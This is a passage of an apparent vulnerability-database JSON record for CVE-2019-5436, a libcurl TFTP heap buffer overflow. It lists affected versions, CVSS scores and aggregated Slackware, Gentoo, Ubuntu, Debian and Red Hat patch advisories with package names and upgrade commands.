        "scope": "eq",
        "trust": 0.3,
        "vendor": "haxx",
        "version": "7.52"
      },
      {
        "model": "libcurl",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "haxx",
        "version": "7.51"
      },
      {
        "model": "libcurl",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "haxx",
        "version": "7.50.3"
      },
      {
        "model": "libcurl",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "haxx",
        "version": "7.50.2"
      },
      {
        "model": "libcurl",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "haxx",
        "version": "7.50.1"
      },
      {
        "model": "libcurl",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "haxx",
        "version": "7.50"
      },
      {
        "model": "libcurl",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "haxx",
        "version": "7.47"
      },
      {
        "model": "libcurl",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "haxx",
        "version": "7.46"
      },
      {
        "model": "libcurl",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "haxx",
        "version": "7.43"
      },
      {
        "model": "libcurl",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "haxx",
        "version": "7.42.1"
      },
      {
        "model": "libcurl",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "haxx",
        "version": "7.36"
      },
      {
        "model": "libcurl",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "haxx",
        "version": "7.34"
      },
      {
        "model": "libcurl",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "haxx",
        "version": "7.33"
      },
      {
        "model": "libcurl",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "haxx",
        "version": "7.32"
      },
      {
        "model": "libcurl",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "haxx",
        "version": "7.31"
      },
      {
        "model": "libcurl",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "haxx",
        "version": "7.30"
      },
      {
        "model": "libcurl",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "haxx",
        "version": "7.25"
      },
      {
        "model": "libcurl",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "haxx",
        "version": "7.23"
      },
      {
        "model": "libcurl",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "haxx",
        "version": "7.22"
      },
      {
        "model": "libcurl",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "haxx",
        "version": "7.21"
      },
      {
        "model": "libcurl",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "haxx",
        "version": "7.20"
      },
      {
        "model": "libcurl",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "haxx",
        "version": "7.19.6"
      },
      {
        "model": "libcurl",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "haxx",
        "version": "7.19.5"
      },
      {
        "model": "libcurl",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "haxx",
        "version": "7.19.4"
      },
      {
        "model": "libcurl",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "haxx",
        "version": "7.55.0"
      },
      {
        "model": "libcurl",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "haxx",
        "version": "7.52.1"
      },
      {
        "model": "libcurl",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "haxx",
        "version": "7.49.0"
      },
      {
        "model": "libcurl",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "haxx",
        "version": "7.48.0"
      },
      {
        "model": "libcurl",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "haxx",
        "version": "7.42.0"
      },
      {
        "model": "libcurl",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "haxx",
        "version": "7.41.0"
      },
      {
        "model": "libcurl",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "haxx",
        "version": "7.40.0"
      },
      {
        "model": "libcurl",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "haxx",
        "version": "7.39"
      },
      {
        "model": "libcurl",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "haxx",
        "version": "7.38.0"
      },
      {
        "model": "libcurl",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "haxx",
        "version": "7.37.1"
      },
      {
        "model": "libcurl",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "haxx",
        "version": "7.37.0"
      },
      {
        "model": "libcurl",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "haxx",
        "version": "7.35.0"
      },
      {
        "model": "libcurl",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "haxx",
        "version": "7.29.0"
      },
      {
        "model": "libcurl",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "haxx",
        "version": "7.28.1"
      },
      {
        "model": "libcurl",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "haxx",
        "version": "7.28.0"
      },
      {
        "model": "libcurl",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "haxx",
        "version": "7.27.0"
      },
      {
        "model": "libcurl",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "haxx",
        "version": "7.26.0"
      },
      {
        "model": "libcurl",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "haxx",
        "version": "7.24.0"
      },
      {
        "model": "libcurl",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "haxx",
        "version": "7.23.1"
      },
      {
        "model": "libcurl",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "haxx",
        "version": "7.21.7"
      },
      {
        "model": "libcurl",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "haxx",
        "version": "7.21.6"
      },
      {
        "model": "libcurl",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "haxx",
        "version": "7.21.5"
      },
      {
        "model": "libcurl",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "haxx",
        "version": "7.21.4"
      },
      {
        "model": "libcurl",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "haxx",
        "version": "7.21.3"
      },
      {
        "model": "libcurl",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "haxx",
        "version": "7.21.2"
      },
      {
        "model": "libcurl",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "haxx",
        "version": "7.21.1"
      },
      {
        "model": "libcurl",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "haxx",
        "version": "7.20.1"
      },
      {
        "model": "libcurl",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "haxx",
        "version": "7.19.7"
      },
      {
        "model": "libcurl",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "haxx",
        "version": "7.65"
      }
    ],
    "sources": [
      {
        "db": "BID",
        "id": "108435"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-5436"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Ubuntu,Debian,Red Hat,Slackware Security Team,l00p3r.,Gentoo",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201905-933"
      }
    ],
    "trust": 0.6
  },
  "cve": "CVE-2019-5436",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "accessComplexity": "LOW",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "nvd@nist.gov",
            "availabilityImpact": "PARTIAL",
            "baseScore": 4.6,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 3.9,
            "id": "CVE-2019-5436",
            "impactScore": 6.4,
            "integrityImpact": "PARTIAL",
            "severity": "MEDIUM",
            "trust": 1.1,
            "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "PARTIAL",
            "baseScore": 4.6,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 3.9,
            "id": "VHN-156871",
            "impactScore": 6.4,
            "integrityImpact": "PARTIAL",
            "severity": "MEDIUM",
            "trust": 0.1,
            "vectorString": "AV:L/AC:L/AU:N/C:P/I:P/A:P",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "LOCAL",
            "author": "nvd@nist.gov",
            "availabilityImpact": "HIGH",
            "baseScore": 7.8,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 1.8,
            "id": "CVE-2019-5436",
            "impactScore": 5.9,
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          }
        ],
        "severity": [
          {
            "author": "nvd@nist.gov",
            "id": "CVE-2019-5436",
            "trust": 1.0,
            "value": "HIGH"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201905-933",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "VULHUB",
            "id": "VHN-156871",
            "trust": 0.1,
            "value": "MEDIUM"
          },
          {
            "author": "VULMON",
            "id": "CVE-2019-5436",
            "trust": 0.1,
            "value": "MEDIUM"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-156871"
      },
      {
        "db": "VULMON",
        "id": "CVE-2019-5436"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201905-933"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-5436"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "A heap buffer overflow in the TFTP receiving code allows for DoS or arbitrary code execution in libcurl versions 7.19.4 through 7.64.1. curl/libcURL is prone a heap-based buffer-overflow vulnerability. \nAn attacker can exploit these issues to execute arbitrary code in the context of the affected application.  Failed exploit attempts will likely result in denial-of-service conditions. \nlibcurl versions 7.19.4 through 7.64.1 are vulnerable. Haxx libcurl is an open source client URL transfer library from Haxx, Sweden. The product supports protocols such as FTP, SFTP, TFTP and HTTP. This vulnerability stems from the incorrect verification of data boundaries when the network system or product performs operations on the memory, resulting in incorrect read and write operations to other associated memory locations. \n\n\nHere are the details from the Slackware 14.2 ChangeLog:\n+--------------------------+\npatches/packages/curl-7.65.0-i586-1_slack14.2.txz:  Upgraded. \n  This release fixes the following security issues:\n  Integer overflows in curl_url_set\n  tftp: use the current blksize for recvfrom()\n  For more information, see:\n    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5435\n    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5436\n  (* Security fix *)\n+--------------------------+\n\n\nWhere to find the new packages:\n+-----------------------------+\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project!  :-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you. \n\nUpdated package for Slackware 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/curl-7.65.0-i486-1_slack14.0.txz\n\nUpdated package for Slackware x86_64 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/curl-7.65.0-x86_64-1_slack14.0.txz\n\nUpdated package for Slackware 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/curl-7.65.0-i486-1_slack14.1.txz\n\nUpdated package for Slackware x86_64 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/curl-7.65.0-x86_64-1_slack14.1.txz\n\nUpdated package for Slackware 14.2:\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/curl-7.65.0-i586-1_slack14.2.txz\n\nUpdated package for Slackware x86_64 14.2:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/curl-7.65.0-x86_64-1_slack14.2.txz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/curl-7.65.0-i586-1.txz\n\nUpdated package for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/curl-7.65.0-x86_64-1.txz\n\n\nMD5 signatures:\n+-------------+\n\nSlackware 14.0 package:\n6e09fa0f3bf3899629f78338886b8166  curl-7.65.0-i486-1_slack14.0.txz\n\nSlackware x86_64 14.0 package:\n55613986ed81a77a573976161b5b76fa  curl-7.65.0-x86_64-1_slack14.0.txz\n\nSlackware 14.1 package:\n4317a7f249ca9dc8fdd9c4470335c140  curl-7.65.0-i486-1_slack14.1.txz\n\nSlackware x86_64 14.1 package:\n1a0cfbced24644f121dcd3140c378d85  curl-7.65.0-x86_64-1_slack14.1.txz\n\nSlackware 14.2 package:\n0112a5878893a036364b3792bb62de6c  curl-7.65.0-i586-1_slack14.2.txz\n\nSlackware x86_64 14.2 package:\n794f036ca4ae31aaad11bdb3e4f1b7d9  curl-7.65.0-x86_64-1_slack14.2.txz\n\nSlackware -current package:\n82112f6caf0dc1d94340b4cf6a3eb001  n/curl-7.65.0-i586-1.txz\n\nSlackware x86_64 -current package:\ndf9c4d1a59fe2f191fd20035c0fcff29  n/curl-7.65.0-x86_64-1.txz\n\n\nInstallation instructions:\n+------------------------+\n\nUpgrade the package as root:\n# upgradepkg curl-7.65.0-i586-1_slack14.2.txz\n\n\n+-----+\n\nSlackware Linux Security Team\nhttp://slackware.com/gpg-key\nsecurity@slackware.com\n\n+------------------------------------------------------------------------+\n| To leave the slackware-security mailing list:                          |\n+------------------------------------------------------------------------+\n| Send an email to majordomo@slackware.com with this text in the body of |\n| the email message:                                                     |\n|                                                                        |\n|   unsubscribe slackware-security                                       |\n|                                                                        |\n| You will get a confirmation message back containing instructions to    |\n| complete the process.  Please do not reply to this email address. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\nGentoo Linux Security Advisory                           GLSA 202003-29\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n                                           https://security.gentoo.org/\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n Severity: Normal\n    Title: cURL: Multiple vulnerabilities\n     Date: March 15, 2020\n     Bugs: #686050, #694020\n       ID: 202003-29\n\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\nSynopsis\n========\n\nMultiple vulnerabilities have been found in cURL, the worst of which\nmay lead to arbitrary code execution. \n\nBackground\n==========\n\nA command line tool and library for transferring data with URLs. \n\nAffected packages\n=================\n\n    -------------------------------------------------------------------\n     Package              /     Vulnerable     /            Unaffected\n    -------------------------------------------------------------------\n  1  net-misc/curl                \u003c 7.66.0                  \u003e= 7.66.0\n\nDescription\n===========\n\nMultiple vulnerabilities have been discovered in cURL. Please review\nthe CVE identifiers referenced below for details. \n\nWorkaround\n==========\n\nThere is no known workaround at this time. \n\nResolution\n==========\n\nAll cURL users should upgrade to the latest version:\n\n  # emerge --sync\n  # emerge --ask --oneshot --verbose \"\u003e=net-misc/curl-7.66.0\"\n\nReferences\n==========\n\n[ 1 ] CVE-2019-5435\n      https://nvd.nist.gov/vuln/detail/CVE-2019-5435\n[ 2 ] CVE-2019-5436\n      https://nvd.nist.gov/vuln/detail/CVE-2019-5436\n[ 3 ] CVE-2019-5481\n      https://nvd.nist.gov/vuln/detail/CVE-2019-5481\n[ 4 ] CVE-2019-5482\n      https://nvd.nist.gov/vuln/detail/CVE-2019-5482\n\nAvailability\n============\n\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n https://security.gentoo.org/glsa/202003-29\n\nConcerns?\n=========\n\nSecurity is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users\u0027 machines is of utmost\nimportance to us. Any security concerns should be addressed to\nsecurity@gentoo.org or alternatively, you may file a bug at\nhttps://bugs.gentoo.org. \n\nLicense\n=======\n\nCopyright 2020 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license. \n\nhttps://creativecommons.org/licenses/by-sa/2.5\n. ==========================================================================\nUbuntu Security Notice USN-3993-1\nMay 22, 2019\n\ncurl vulnerabilities\n==========================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 19.04\n- Ubuntu 18.10\n- Ubuntu 18.04 LTS\n- Ubuntu 16.04 LTS\n\nSummary:\n\nSeveral security issues were fixed in curl. This issue only affected Ubuntu 19.04. (CVE-2019-5435)\n\nIt was discovered that curl incorrectly handled memory when receiving data\nfrom a TFTP server. (CVE-2019-5436)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 19.04:\n  curl                            7.64.0-2ubuntu1.1\n  libcurl3-gnutls                 7.64.0-2ubuntu1.1\n  libcurl3-nss                    7.64.0-2ubuntu1.1\n  libcurl4                        7.64.0-2ubuntu1.1\n\nUbuntu 18.10:\n  curl                            7.61.0-1ubuntu2.4\n  libcurl3-gnutls                 7.61.0-1ubuntu2.4\n  libcurl3-nss                    7.61.0-1ubuntu2.4\n  libcurl4                        7.61.0-1ubuntu2.4\n\nUbuntu 18.04 LTS:\n  curl                            7.58.0-2ubuntu3.7\n  libcurl3-gnutls                 7.58.0-2ubuntu3.7\n  libcurl3-nss                    7.58.0-2ubuntu3.7\n  libcurl4                        7.58.0-2ubuntu3.7\n\nUbuntu 16.04 LTS:\n  curl                            7.47.0-1ubuntu2.13\n  libcurl3                        7.47.0-1ubuntu2.13\n  libcurl3-gnutls                 7.47.0-1ubuntu2.13\n  libcurl3-nss                    7.47.0-1ubuntu2.13\n\nIn general, a standard system update will make all the necessary changes. 7.7) - ppc64, ppc64le, s390x, x86_64\n\n3. This only affects\n    the oldstable distribution (stretch). \n\nCVE-2019-5481\n\n    Thomas Vegas discovered a double-free in the FTP-KRB code, triggered\n    by a malicious server sending a very large data block. \n\nFor the oldstable distribution (stretch), these problems have been fixed\nin version 7.52.1-5+deb9u10. \n\nFor the stable distribution (buster), these problems have been fixed in\nversion 7.64.0-4+deb10u1. \n\nWe recommend that you upgrade your curl packages. \n\nFor the detailed security status of curl please refer to\nits security tracker page at:\nhttps://security-tracker.debian.org/tracker/curl\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n-----BEGIN PGP SIGNATURE-----\n\niQIzBAEBCgAdFiEEBsId305pBx+F583DbwzL4CFiRygFAl5UJtgACgkQbwzL4CFi\nRyiozQ//TWmlmQt7fsskJtczrkjToirTdbgmzBeRI6PL2HXEZYY7WtdQzXDHqTb5\neQwrIrKsSrS30QneeeGHPEABhfUBCIQRiXocd5enAdQbqPchTIVl92YrZhHZqjbU\naP0q02QZrhn6nidzA+c3sU7ClW0YERVXOuVZAhQDnw0y1Iai5yVuQvIOhDYIEOdU\nG86svqzr4UAMdZPFP0N1avyHmonNB1/UC//l/g2s7q2ki7NOBCMfg2QV5+/6Ip0F\ntR8mgpukO7l+M0Jhb3SeCaGaRvbHDlkFIyGXKbDyffs14ceRykm/fhxB2bc8dSK7\nKLGjRLXJyHKCCoWzafHk13aNGu0jVqaRrCcyezhI8fnr9V/enDbnzLeEWGGL8H3e\nqVTyY+ykypinWeIRv+5VQtgrAhEJ6ZCiGCmbRyhwP0s8Yu5MlOJeS1L4GnBUbYuH\nZhB/DWtqFlh/Rgjs6XWr/CwzxFAps+wbKjY8l8/C18308J0bKq1sx4XWSEmXrMMj\nKbdVNKEjvA3n8HTa4CC+CgVA7723ysCERbKnTLKTu8rgPA9QDMyyxNpenVeB24DW\nG9rrnokVK0c56EeDlAOCB3gSA4XoDt3k+xP4vfaBcyzGj/mkEsOeAT6+lzqPbO30\nKqjBEQgVzb5nvKpPhJF8f71DXegfFvDL2ti5G4wkfRME4ytM6Wg=QC2b\n-----END PGP SIGNATURE-----\n. Description:\n\nRed Hat OpenShift Container Platform is Red Hat\u0027s cloud computing\nKubernetes application platform solution designed for on-premise or private\ncloud deployments. \n\nSecurity Fix(es):\n\n* golang.org/x/crypto: Processing of crafted ssh-ed25519 public keys allows\nfor panic (CVE-2020-9283)\n\n* SSL/TLS: CBC padding timing attack (lucky-13) (CVE-2013-0169)\n\n* grafana: XSS vulnerability via a column style on the \"Dashboard \u003e Table\nPanel\" screen (CVE-2018-18624)\n\n* js-jquery: prototype pollution in object\u0027s prototype leading to denial of\nservice or remote code execution or property injection (CVE-2019-11358)\n\n* npm-serialize-javascript: XSS via unsafe characters in serialized regular\nexpressions (CVE-2019-16769)\n\n* kibana: Prototype pollution in TSVB could result in arbitrary code\nexecution (ESA-2020-06) (CVE-2020-7013)\n\n* nodejs-minimist: prototype pollution allows adding or modifying\nproperties of Object.prototype using a constructor or __proto__ payload\n(CVE-2020-7598)\n\n* npmjs-websocket-extensions: ReDoS vulnerability in\nSec-WebSocket-Extensions parser (CVE-2020-7662)\n\n* nodejs-lodash: prototype pollution in zipObjectDeep function\n(CVE-2020-8203)\n\n* jquery: Cross-site scripting due to improper injQuery.htmlPrefilter\nmethod (CVE-2020-11022)\n\n* jQuery: passing HTML containing \u003coption\u003e elements to manipulation methods\ncould result in untrusted code execution (CVE-2020-11023)\n\n* grafana: stored XSS (CVE-2020-11110)\n\n* grafana: XSS annotation popup vulnerability (CVE-2020-12052)\n\n* grafana: XSS via column.title or cellLinkTooltip (CVE-2020-12245)\n\n* nodejs-elliptic: improper encoding checks allows a certain degree of\nsignature malleability in ECDSA signatures (CVE-2020-13822)\n\n* golang.org/x/text: possibility to trigger an infinite loop in\nencoding/unicode could lead to crash (CVE-2020-14040)\n\n* nodejs-ajv: prototype pollution via crafted JSON schema in ajv.validate\nfunction (CVE-2020-15366)\n\n* openshift/console: text injection on error page via crafted url\n(CVE-2020-10715)\n\n* kibana: X-Frame-Option not set by default might lead to clickjacking\n(CVE-2020-10743)\n\n* openshift: restricted SCC allows pods to craft custom network packets\n(CVE-2020-14336)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. Solution:\n\nFor OpenShift Container Platform 4.6 see the following documentation, which\nwill be updated shortly for this release, for important instructions on how\nto upgrade your cluster and fully apply this asynchronous errata update:\n\nhttps://docs.openshift.com/container-platform/4.6/release_notes/ocp-4-6-rel\nease-notes.html\n\nDetails on how to access this content are available at\nhttps://docs.openshift.com/container-platform/4.6/updating/updating-cluster\n- -cli.html. Bugs fixed (https://bugzilla.redhat.com/):\n\n907589 - CVE-2013-0169 SSL/TLS: CBC padding timing attack (lucky-13)\n1701972 - CVE-2019-11358 jquery: Prototype pollution in object\u0027s prototype leading to denial of service, remote code execution, or property injection\n1767665 - CVE-2020-10715 openshift/console: text injection on error page via crafted url\n1804533 - CVE-2020-9283 golang.org/x/crypto: Processing of crafted ssh-ed25519 public keys allows for panic\n1813344 - CVE-2020-7598 nodejs-minimist: prototype pollution allows adding or modifying properties of Object.prototype using a constructor or __proto__ payload\n1828406 - CVE-2020-11022 jquery: Cross-site scripting due to improper injQuery.htmlPrefilter method\n1834550 - CVE-2020-10743 kibana: X-Frame-Option not set by default might lead to clickjacking\n1845982 - CVE-2020-7662 npmjs-websocket-extensions: ReDoS vulnerability in Sec-WebSocket-Extensions parser\n1848089 - CVE-2020-12052 grafana: XSS annotation popup vulnerability\n1848092 - CVE-2019-16769 npm-serialize-javascript: XSS via unsafe characters in serialized regular expressions\n1848643 - CVE-2020-12245 grafana: XSS via column.title or cellLinkTooltip\n1848647 - CVE-2020-13822 nodejs-elliptic: improper encoding checks allows a certain degree of signature malleability in ECDSA signatures\n1849044 - CVE-2020-7013 kibana: Prototype pollution in TSVB could result in arbitrary code execution (ESA-2020-06)\n1850004 - CVE-2020-11023 jquery: Passing HTML containing \u003coption\u003e elements to manipulation methods could result in untrusted code execution\n1850572 - CVE-2018-18624 grafana: XSS vulnerability via a column style on the \"Dashboard \u003e Table Panel\" screen\n1853652 - CVE-2020-14040 golang.org/x/text: possibility to trigger an infinite loop in encoding/unicode could lead to crash\n1857412 - CVE-2020-8203 nodejs-lodash: prototype pollution in zipObjectDeep function\n1857977 - CVE-2020-15366 nodejs-ajv: prototype pollution via crafted JSON schema in ajv.validate function\n1858981 - CVE-2020-14336 openshift: restricted SCC allows pods to craft custom network packets\n1861044 - CVE-2020-11110 grafana: stored XSS\n1874671 - CVE-2020-14336 ose-machine-config-operator-container: openshift: restricted SCC allows pods to craft custom network packets [openshift-4]\n\n5. 8) - aarch64, ppc64le, s390x, x86_64\n\n3. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\n=====================================================================\n                   Red Hat Security Advisory\n\nSynopsis:          Low: curl security and bug fix update\nAdvisory ID:       RHSA-2020:1020-01\nProduct:           Red Hat Enterprise Linux\nAdvisory URL:      https://access.redhat.com/errata/RHSA-2020:1020\nIssue date:        2020-03-31\nCVE Names:         CVE-2019-5436 \n=====================================================================\n\n1. Summary:\n\nAn update for curl is now available for Red Hat Enterprise Linux 7. \n\nRed Hat Product Security has rated this update as having a security impact\nof Low. A Common Vulnerability Scoring System (CVSS) base score, which\ngives a detailed severity rating, is available for each vulnerability from\nthe CVE link(s) in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Client (v. 7) - x86_64\nRed Hat Enterprise Linux Client Optional (v. 7) - x86_64\nRed Hat Enterprise Linux ComputeNode (v. 7) - x86_64\nRed Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64\nRed Hat Enterprise Linux Server (v. 7) - ppc64, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux Workstation (v. 7) - x86_64\n\n3. Description:\n\nThe curl packages provide the libcurl library and the curl utility for\ndownloading files from servers using various protocols, including HTTP,\nFTP, and LDAP. \n\nSecurity Fix(es):\n\n* curl: TFTP receive heap buffer overflow in tftp_receive_packet() function\n(CVE-2019-5436)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. \n\nAdditional Changes:\n\nFor detailed information on changes in this release, see the Red Hat\nEnterprise Linux 7.8 Release Notes linked from the References section. \n\n4. Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1710620 - CVE-2019-5436 curl: TFTP receive heap buffer overflow in tftp_receive_packet() function\n1754736 - curl does not send Authorization header when receiving WWW-Authenticate header twice\n1769307 - curl fails while attempting to POST a char device\n\n6. Package List:\n\nRed Hat Enterprise Linux Client (v. 7):\n\nSource:\ncurl-7.29.0-57.el7.src.rpm\n\nx86_64:\ncurl-7.29.0-57.el7.x86_64.rpm\ncurl-debuginfo-7.29.0-57.el7.i686.rpm\ncurl-debuginfo-7.29.0-57.el7.x86_64.rpm\nlibcurl-7.29.0-57.el7.i686.rpm\nlibcurl-7.29.0-57.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Client Optional (v. 7):\n\nx86_64:\ncurl-debuginfo-7.29.0-57.el7.i686.rpm\ncurl-debuginfo-7.29.0-57.el7.x86_64.rpm\nlibcurl-devel-7.29.0-57.el7.i686.rpm\nlibcurl-devel-7.29.0-57.el7.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode (v. 7):\n\nSource:\ncurl-7.29.0-57.el7.src.rpm\n\nx86_64:\ncurl-7.29.0-57.el7.x86_64.rpm\ncurl-debuginfo-7.29.0-57.el7.i686.rpm\ncurl-debuginfo-7.29.0-57.el7.x86_64.rpm\nlibcurl-7.29.0-57.el7.i686.rpm\nlibcurl-7.29.0-57.el7.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode Optional (v. 7):\n\nx86_64:\ncurl-debuginfo-7.29.0-57.el7.i686.rpm\ncurl-debuginfo-7.29.0-57.el7.x86_64.rpm\nlibcurl-devel-7.29.0-57.el7.i686.rpm\nlibcurl-devel-7.29.0-57.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 